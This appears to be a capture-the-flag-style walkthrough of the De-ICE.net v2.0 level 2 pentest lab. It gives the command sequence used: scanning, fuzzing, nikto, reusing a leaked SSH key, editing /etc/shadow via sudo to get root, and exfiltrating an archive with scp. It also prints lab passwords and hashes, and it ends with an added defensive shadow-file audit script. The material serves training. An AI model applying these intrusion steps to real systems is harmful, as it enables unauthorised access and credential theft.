De-ICE.net v2.0 (2.100) {Level 2 - Disk 1}

This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD" that creates one or more targets on which to practise penetration testing; it has an "end goal" to reach.

Links

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v2.0_(2.100).mp4

Tools

  • BackTrack 4 (Final)
  • de-ice.net-2.100-1.0.iso (MD5: 09798f85bf54a666fbab947300f38163)
  • Dictionary(s)

Software

Name: De-ICE.net

Version: 2.0 (Level 1 - Disk 2 - IP Address: 2.100)

Home Page: http://www.de-ice.net/ or hxxp://heorot.net/livecds/

Download Link: hxxp://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso (new: http://hackingdojo.com/dojo-media/)

Forums/Support: hxxp://forums.heorot.net/ or hxxp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[ ]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[ ]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (root, admin) with '~' in front. -> http://192.168.2.101 -> 80


firefox
[ ]kate -> Update usernames with the ones which we got a response from. Save.
[ ]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox
// Save both files
mv /root/id_rsa /root/.ssh/id_rsa
mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
chmod 000 /root/.ssh/id_rsa
chmod 000 /root/.ssh/id_rsa.pub
ssh [email protected]
// Yes

mailx
// 3 - we see that havisham's password is 'changeme'. 7 - we see pirrip's password is '0l1v3rTw1st'

cd /etc/
vi passwd

// kate -> Update usernames with only valid ones.

vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d   [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/

//In BackTrack//
scp [email protected]:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08

//In SSH//
sudo vi /var/mail/havisham
modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Username: pirrip. Password: 0l1v3rTw1st //
ls -a

//In SSH//
exit

//In BackTrack//
[ ]Firefox -> Send a REAL email to: [email protected]


----------------------------------------------------------------------------------------------------
Users
root:[email protected]     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
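
All four shadow entries in the Users table use the $1$ (md5crypt) prefix, and none has a meaningful maximum password age (root's field is empty, the others are 99999 days). As an added example, not part of the original walkthrough, this shell function audits shadow-format input for those two conditions; the function names and the "auditor" line (placeholder salt and hash) are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit shadow(5)-format lines for weak hash schemes and aging.
# Fields: name:hash:lastchg:min:max:warn:inactive:expire:reserved

# The first four lines are the entries from the Users table on this page;
# "auditor" is a constructed entry (placeholder salt/hash) for contrast.
sample_shadow() {
    cat <<'EOF'
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
auditor:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:19000:0:90:7:::
EOF
}

# Reads shadow lines on stdin; prints "name<TAB>scheme<TAB>findings".
audit_shadow() {
    awk -F: '
    # Map the crypt(3) prefix of the hash field to a scheme name.
    function scheme(h) {
        if (h == "")             return "empty"
        if (h ~ /^[!*]/)         return "locked"
        if (h ~ /^\$1\$/)        return "md5crypt"
        if (h ~ /^\$2[abxy]?\$/) return "bcrypt"
        if (h ~ /^\$5\$/)        return "sha256crypt"
        if (h ~ /^\$6\$/)        return "sha512crypt"
        if (h ~ /^\$y\$/)        return "yescrypt"
        return "des-or-unknown"
    }
    NF >= 5 {
        s = scheme($2); f = ""
        if (s == "empty")                             f = f ",no-password"
        if (s == "md5crypt" || s == "des-or-unknown") f = f ",weak-hash"
        # Field 5 is the maximum password age in days; empty or 99999
        # means the password effectively never expires.
        if ($5 == "" || $5 + 0 >= 99999)              f = f ",no-max-age"
        if (f == "") f = ",ok"
        printf "%s\t%s\t%s\n", $1, s, substr(f, 2)
    }'
}

sample_shadow | audit_shadow
```

On a live system the same function can be fed the real file by a privileged user, for example by piping the output of "sudo cat /etc/shadow" into audit_shadow.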

Notes

Song: Ashley Wallbridge - Masquerade (Original Mix)

Video length: 09:07

Capture length: 30:35

Blog Post: https://blog.g0tmi1k.com/2010/02/de-icenet-v20-1100-level-2-disk-1/

Dictionaries: https://blog.g0tmi1k.com/2010/02/sitenews-february-2010-isos-and/